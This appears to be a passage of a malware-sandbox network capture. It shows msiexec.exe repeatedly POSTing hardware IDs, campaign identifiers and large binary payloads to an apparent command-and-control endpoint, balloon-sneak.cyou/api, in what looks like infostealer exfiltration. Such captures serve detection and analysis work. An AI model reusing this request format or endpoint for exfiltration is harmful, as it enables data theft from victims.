                                                                                                                                                                                                          Data Ascii: gB43se/6sKTnS5fi+5EbDbrm5fVJKyg7h0o4NKC7GsEQziUi7v1jMTQE1KD7VhvK6SB0cBspr6kT3r7yY/pYxFOatvDs+fMmpsrW4nlQGsi5ZOe2Cyksu0FN6mVz+V7Vhg47ce33M+K0D4WmaFJbmS83p7LIam25Bo84tqO4WMWQ3jfwLPry5GaKFGS6UpwJOia35dspqqkT3rZ2ITuYxtVOMWFpa3LkNB5GIjqRWQv552R0iauve4RPOHej+5j
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 66 62 75 36 32 43 33 4a 5a 68 41 4e 43 76 44 6d 59 31 70 4d 62 50 69 33 66 30 34 62 4e 48 61 50 61 56 6c 71 4a 31 56 68 67 71 6c 49 75 75 72 5a 54 63 31 79 4a 4b 6b 75 64 4e 64 43 65 6a 6f 4b 48 35 4a 36 32 78 36 42 59 39 71 5a 58 50 37 53 4e 4f 65 54 6a 5a 32 61 36 69 33 59 71 64 4d 56 2f 4d 36 56 39 76 4b 4b 54 51 33 35 55 6f 71 72 37 68 45 43 71 6d 79 5a 2f 70 62 77 41 4d 66 4d 69 4c 38 71 33 64 6c 35 38 7a 56 6f 65 75 58 33 51 70 39 4a 32 61 33 6d 43 70 6f 2b 6b 62 65 71 65 62 6d 75 6c 76 45 45 31 74 6c 64 71 71 37 74 71 62 33 43 6c 4a 6a 65 30 4f 58 57 71 6b 68 74 2b 42 62 4a 53 78 36 68 6b 39 2f 38 72 43 77 6d 67 61 51 33 54 62 7a 50 79 6a 6a 4a 72 51 65 51 76 4f 6f 55 70 7a 5a 4c 7a 4f 7a 59 4a 35 38 75 57 30 52 53 57 6e 77 73 2f 30 49 30 34 53 4e
                                                                                                                                                                                                          Data Ascii: fbu62C3JZhANCvDmY1pMbPi3f04bNHaPaVlqJ1VhgqlIuurZTc1yJKkudNdCejoKH5J62x6BY9qZXP7SNOeTjZ2a6i3YqdMV/M6V9vKKTQ35Uoqr7hECqmyZ/pbwAMfMiL8q3dl58zVoeuX3Qp9J2a3mCpo+kbeqebmulvEE1tldqq7tqb3ClJje0OXWqkht+BbJSx6hk9/8rCwmgaQ3TbzPyjjJrQeQvOoUpzZLzOzYJ58uW0RSWnws/0I04SN
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 74 6c 4e 7a 58 4c 31 57 42 34 6b 42 68 4e 76 61 59 6e 4d 38 76 35 6f 7a 61 4d 6a 66 6b 33 6f 48 6c 58 53 68 68 63 73 72 47 73 2b 72 79 6f 71 63 77 58 35 43 6a 61 47 45 79 35 39 37 52 6d 54 54 68 36 71 51 32 4d 50 6e 57 67 4f 55 6a 57 41 42 38 6d 70 50 38 79 4d 47 52 6c 53 39 66 77 73 42 45 63 69 6e 72 6d 64 2b 58 62 4b 33 79 76 46 63 37 34 38 75 43 37 57 52 61 52 32 4c 64 69 2f 4b 74 77 74 7a 49 59 56 6d 4b 38 55 4e 74 49 36 69 59 6b 64 64 73 76 76 7a 39 56 79 79 70 67 39 79 73 49 77 51 41 49 4a 71 4d 73 75 44 4e 6e 35 34 69 53 70 4c 6e 54 58 51 6e 6f 36 43 68 2f 43 47 73 74 2b 6f 51 42 4e 66 36 68 66 4a 75 47 55 63 36 2b 73 79 71 37 76 4b 69 70 7a 42 66 6b 4b 4e 6f 59 54 4c 6e 33 74 47 5a 4e 4f 48 71 70 44 59 77 2b 64 61 41 35 53 45 32 52 32 37 5a 69 2f
                                                                                                                                                                                                          Data Ascii: tlNzXL1WB4kBhNvaYnM8v5ozaMjfk3oHlXShhcsrGs+ryoqcwX5CjaGEy597RmTTh6qQ2MPnWgOUjWAB8mpP8yMGRlS9fwsBEcinrmd+XbK3yvFc748uC7WRaR2Ldi/KtwtzIYVmK8UNtI6iYkddsvvz9Vyypg9ysIwQAIJqMsuDNn54iSpLnTXQno6Ch/CGst+oQBNf6hfJuGUc6+syq7vKipzBfkKNoYTLn3tGZNOHqpDYw+daA5SE2R27Zi/


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.449739172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:00 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=1EO9KR8T3
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 18111
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:00 UTC15331OUTData Raw: 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 31 45 4f 39 4b 52 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                          Data Ascii: --1EO9KR8T3Content-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--1EO9KR8T3Content-Disposition: form-data; name="pid"2--1EO9KR8T3Content-Disposition: form-data; name="lid"MeHdy4--pl8vs07--1EO9KR8T3Content-Di
                                                                                                                                                                                                          2024-11-29 14:46:00 UTC2780OUTData Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
                                                                                                                                                                                                          Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                                                                                                                                          2024-11-29 14:46:02 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:46:02 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=e2r5o2mmg2atmdsch0q53dfeks; expires=Tue, 25-Mar-2025 08:32:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9jXUkw34jGXmUDf56v7dsp6asycntIyO3zyECT%2BXw2PI2RF0cjEdlSru5Sbgkv3RdaB1XR9O3nFZOvEN%2FA42EZy6wXZc490lSykfbFQkZfITd%2FfQO3to%2BRgcX6DTSiJYoywtYTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea3627d089d42b2-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12289&min_rtt=12219&rtt_var=4723&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19066&delivery_rate=228446&cwnd=236&unsent_bytes=0&cid=2b58c98f4bfd421c&ts=2554&x=0"
                                                                                                                                                                                                          2024-11-29 14:46:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                          2024-11-29 14:46:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.449747172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:04 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=38KS5A4HANM6
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 8750
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:04 UTC8750OUTData Raw: 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 33 38 4b 53 35 41 34 48 41 4e 4d 36
                                                                                                                                                                                                          Data Ascii: --38KS5A4HANM6Content-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--38KS5A4HANM6Content-Disposition: form-data; name="pid"2--38KS5A4HANM6Content-Disposition: form-data; name="lid"MeHdy4--pl8vs07--38KS5A4HANM6
                                                                                                                                                                                                          2024-11-29 14:46:07 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:46:06 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=mu0i433gnlhis203abt4g32jtp; expires=Tue, 25-Mar-2025 08:32:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Q9q44lgD1Lslx%2FMmwAju3q%2BpfB47g3zsYViR6FX%2FQcA4DGbYMAdPG3c94%2BVvHR33HccWVP1ZuohlmJm9a0AvxFJIspPSR%2ByQ4f9WAbgrESch9MB8awYuDkLDoGwHOn0Mkrj%2F2A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea362973ee71821-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=85826&min_rtt=1502&rtt_var=50418&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9685&delivery_rate=1944074&cwnd=242&unsent_bytes=0&cid=3b85b6717fe1976d&ts=2573&x=0"
                                                                                                                                                                                                          2024-11-29 14:46:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                          2024-11-29 14:46:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.449758172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:09 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=QHZY9VZIKCL5L
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 20409
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:09 UTC15331OUTData Raw: 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b 43 4c 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 51 48 5a 59 39 56 5a 49 4b
                                                                                                                                                                                                          Data Ascii: --QHZY9VZIKCL5LContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--QHZY9VZIKCL5LContent-Disposition: form-data; name="pid"3--QHZY9VZIKCL5LContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07--QHZY9VZIK
                                                                                                                                                                                                          2024-11-29 14:46:09 UTC5078OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                          2024-11-29 14:46:12 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:46:12 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=gfo5adtqdvfk8peiuam1pi91ph; expires=Tue, 25-Mar-2025 08:32:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaLiQ%2B8qKglOzyIui3Tc3Q81WeeKG1eCP8NiKp0qWyckZB5SJuovsQuQ7xAgTf9tha3EswmjeU4%2BokZevywDuqfTCp6Oyn%2BeCQAFvy2jOA8UVuHxVq2e5HmsxyErCM5aeU0QAaE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea362b3d828ef9d-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=21&recv=28&lost=0&retrans=1&sent_bytes=4230&recv_bytes=21368&delivery_rate=39156&cwnd=98&unsent_bytes=0&cid=fb8e18977cb2972e&ts=3174&x=0"
                                                                                                                                                                                                          2024-11-29 14:46:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                          2024-11-29 14:46:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.449771172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:13 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=W72OX4OUIQ3F8WYSF
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 1237
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:13 UTC1237OUTData Raw: 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 37 32 4f 58 34 4f 55 49 51 33 46 38 57 59 53 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d
                                                                                                                                                                                                          Data Ascii: --W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="pid"1--W72OX4OUIQ3F8WYSFContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07
                                                                                                                                                                                                          2024-11-29 14:46:16 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:46:16 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=2418atgl91ljhorh84l30gc5js; expires=Tue, 25-Mar-2025 08:32:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZOS%2FPjrYtJcJIjnn5RnKz5bB%2Ff3P%2Be99OddqhNFSOV4%2BghbckDwvGOhaLRZmSks2Fjf%2BCqqk%2FJ2ct%2BTQF4N293FtiRKa05gLMbZVEOREJ3xdb3vXLizWg4XJQspLeBsyOfGduM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea362d1da477cf9-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1913&rtt_var=956&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4230&recv_bytes=2155&delivery_rate=193045&cwnd=207&unsent_bytes=0&cid=5dc4adec8aa7e409&ts=2628&x=0"
                                                                                                                                                                                                          2024-11-29 14:46:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                          2024-11-29 14:46:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.449783172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=XMVUGMOX0EZFEHT
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 476224
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 41 35 33 41 30 41 43 45 31 42 38 37 41 33 31 36 39 34 32 38 46 39 39 44 46 42 34 37 44 39 0d 0a 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 4d 56 55 47 4d 4f 58 30 45 5a 46 45 48 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 0d 0a 2d 2d 58 4d 56
                                                                                                                                                                                                          Data Ascii: --XMVUGMOX0EZFEHTContent-Disposition: form-data; name="hwid"36A53A0ACE1B87A3169428F99DFB47D9--XMVUGMOX0EZFEHTContent-Disposition: form-data; name="pid"1--XMVUGMOX0EZFEHTContent-Disposition: form-data; name="lid"MeHdy4--pl8vs07--XMV
                                                                                                                                                                                                          2024-11-29 14:46:18 UTC15331OUTData Raw: 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28
                                                                                                                                                                                                          Data Ascii: Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(
